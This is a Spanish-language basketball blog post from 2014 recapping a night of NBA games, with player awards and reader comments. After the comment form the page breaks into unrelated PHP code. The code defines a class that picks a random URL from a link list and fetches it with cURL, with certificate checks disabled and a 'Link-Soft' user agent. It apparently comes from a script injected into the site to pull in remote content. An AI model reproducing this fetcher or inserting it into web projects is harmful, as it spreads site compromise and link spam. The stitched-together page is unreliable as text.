La Crónica: Temerás hasta al cervatillo

04 de February de 2014 por TheDeerHunter

Cada año hay algún equipo que mide la incapacidad ajena. Cada partido contra ellos supone un trámite y en las contadas ocasiones en las presentan batalla, más por demérito ajeno que por mérito propio, marcan el listón de donde no se puede caer más bajo. Hay otros equipos que tienen tendencia histórica a complicarse la vida. Hablamos, como no, de los Knicks que tropezaron nada menos que en Milwaukee. Justo cuando parecía que tenían más cerca la “redención” han llegado dos derrotas consecutivas, ésta segunda muy extraña. El caso es que los Knicks estaban generando sensaciones positivas, parecidas al año pasado. Melo, excelente de “4”, JR Smith, fantástico desde el banco, correcto ratio de pérdidas, aceptable desempeño bajo aros… Fue en los tiros libres donde comenzó a fraguarse la tragedia y en una pésima defensa de perímetro particularmente sangrante con el small-ball que tenían desplegado. Así que llegaron igualados a los últimos instantes en los que Brandon Knight terminó de merendarse a Felton con un triple definitivo en su cara. Cosas que pasan (98-101).

No fue el único triple ganador de la noche. Extraordinario duelo que vimos en Denver, tanto en el aspecto individual como en el colectivo. Brilló Blake Griffin pero Faried cuajó ante él su mejor partido del año. Los Clippers hicieron daño con sus hombres altos pero los Nuggets se mostraron más equilibrados en un flojo partido de Redick y Collison por parte de los visitantes. Con todo, se llegó también en el alambre a los instantes finales y ahí se destapó el tarro de las esencias. Desde el 107-107 a falta de 2:30 hubo hasta 8 alternancias en el marcador, incluido el triple de Barnes a falta de 6” y la increible respuesta de Randy Foye, desde lejísimos (115-116). 

Fue éste el mejor partido de la jornada porque esperábamos mucho más del Memphis@Thunder atendiendo a la reciente trayectoria de ambos. Lo cierto es que hubo poco color. Durant se quitó la espina de los últimos playoffs volviendo a superar la treintena y fue la defensa de los Thunder la que maniató a sus rivales. Una actuación muy espesa de los osos (77-86).

Además del batacazo de Knicks vimos un par de resultados relativamente sorprendentes. Los Blazers cayeron en Washington ante unos Wizards que superan el 50% por primera vez desde el 2009. Bonito duelo Wall vs Lillard y gran actuación tanto de Ariza como de Seraphin, frente a un banco rival prácticamente invisible. Los Blazers parecen encontrarse en su peor momento del año (90-100). El otro fue la apabullante victoria de los Kings ante Chicago, con Cousins devorando a sus rivales cual ternerillos tras la absurda pérdida de papeles de Joakim Noah, expulsado tras una exagerada protesta por un quítame allá una falta (70-99).

El resto de la velada discurrió más o menos en los términos esperados. Los Pacers no tuvieron ningún problema ante Orlando; los Nets volvieron a la senda de la victoria ante Sixers; LeBron rozó el triple doble para doblegar a los Pistons con más problemas de los previstos; Parker lideró a los Spurs en New Orleans con 32 puntos; los Mavs destrozaron la sutil defensa de los Cavs, y los Raptors ganaron en Salt Lake City.

PREMIOS

MVP: Exhibición de Kenneth Faried. En 31 minutos anotó 28 puntos, cogió 11 rebotes y puso un par de pinchos de merluza. Mientras, los dos machos alfa de la liga, Kevin Durant y Lebron James, rozaron el triple doble. 31-8-8 para el de los Thunder y 24-8-11 (y 2 robos y 2 tapones) para el de Miami.

Rookie: Victor Oladipo y Michael Carter Williams siguen con su particular pulso aunque el de ayer no fue un día redondo para ninguno de los 2. El de los Magic se quedó en 6 puntos pero repartió 11 asisetncias y robó 4 balones mientras que el de los Sixers anotó 21 puntos pero perdió 6 balonesBuen partido de Giannis Antetokounmpo que ha vuelto al banquillo donde se vive con menos presión. 15 puntos, 3 rebotes y 2 asistencias para el griego. Rudy Gobert se quedó sin anotar pero cogió 8 reboes y puso 3 tapones.

Sorpresa: Actuaciones como la de ayer de Shaun Livingstone nos obligan a preguntarnos qué nos perdimos por culpa de las lesiones. Empezó de titular y acabó con 13 puntos, 6 rebotes, 8 asistencias y 7 robos. Por su parte, Samuel Dalembert recordó al jugador de antaño tras anotar 18 puntos conun 7 de  8 en tiros. Además capturó 8 rebotes y puso 2 tapones. Todo, en apenas 25 minutos. Otro pívot, Kevin Seraphin, también aprovechó al máximo los minutos que le dieron. 19-5 en 23 minutos.

Decepción: Dion Waiters jugó sólo 11 minutos en los que falló los 4 tiros que intentó y no aportó prácticamente nada. Número 4 del draft del año pasado, recordémoslo. George Hill falló 7 de los 8 tiros que intentó. Tener a Oladipo enfrente debe poner nervioso.

Esfuerzo en vano: Blake Griffin se quedó bien cerca de conseguir la victoria pero Randy Foye se la estropeó con su buzzer-beater. Al final, sus 36 puntos y 11 rebotes no sirvieron de nada.

TOP-10

Imágenes | AP Photos / Getty Images

Comenta

6 comentarios a esta entrada

  1. Vader dice:
    #1

    Los Knicks necesitan urgentemente un base más físico que pueda defender a nivel NBA porque cualquier base joven y/o atlético nos hace un roto… Si Rondo esta imposible que busquen otras opciones, Lowry? Jarret Jack? Algo!!!

    Saludos

      Citar

  2. Ruxixon dice:
    #2

    No sé con qué video quedarme,si el de Noah o el de Derrick “mate interruptus” Williams, jajaj.

      Citar

  3. Sancho88 dice:
    #3

    A ver si va a ser verdad lo que dijo Woodson en su momento: “Cuando no está Kenyon Martin, perdemos. Es el que mejor defiende”. Como tiene que estar la cosa en NY para que algunos piensen eso. Y ojo, creo que Woodson no es tan desastroso como se le pinta en muchas ocasiones. El año pasado construyó una defensa muy buena que por lesiones no está pudiendo recuperar al 100% este año.

      Citar

  4. nba dice:
    #4

    Vader:
    Los Knicks necesitan urgentemente un base más físico que pueda defender a nivel NBA porque cualquier base joven y/o atlético nos hace un roto… Si Rondo esta imposible que busquen otras opciones, Lowry? Jarret Jack? Algo!!!
    Saludos
    Los Lakers ofrecemos a Nash …, si quereis enviarnos a Melo lo aceptaremos de buen grado

      Citar

  5. Esteban dice:
    #5

    Los Raptors cada vez mas consolidados y candidatos al tercer puesto del este, pregunto, es su mejor colocacion historica o o algun año con carter clasificaron mejor?

      Citar

  6. heineken dice:
    #6

    Esteban:
    Los Raptors cada vez mas consolidados y candidatos al tercer puesto del este, pregunto, es su mejor colocacion historica o o algun año con carter clasificaron mejor?

    La mejor temporada fue la 2000/2001 con 47 victorias y cayendo en 2º ronda frente a Philadelphia por 4-3. Brutal serie entre Vince e Iverson, Carter hizo récord de playoffs de triples anotados sin fallo con 8 metiendo 50 puntos en un partido, pero falló el tiro de la victoria del 7º partido y luego a los fans de Toronto no les sentó nada bien que esa mañana se fuese antes del partido a Carolina del Norte a su graduación. A partir de ahí vino la ruptura entre Carter y la afición canadiense.

    Luego en la 2006-2007 repitieron las 47 victorias y fueron 3º al ganar su división (por numero de victorias serían 4º). Pero en 1º ronda les ganó New Jersey Nets 4-2.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>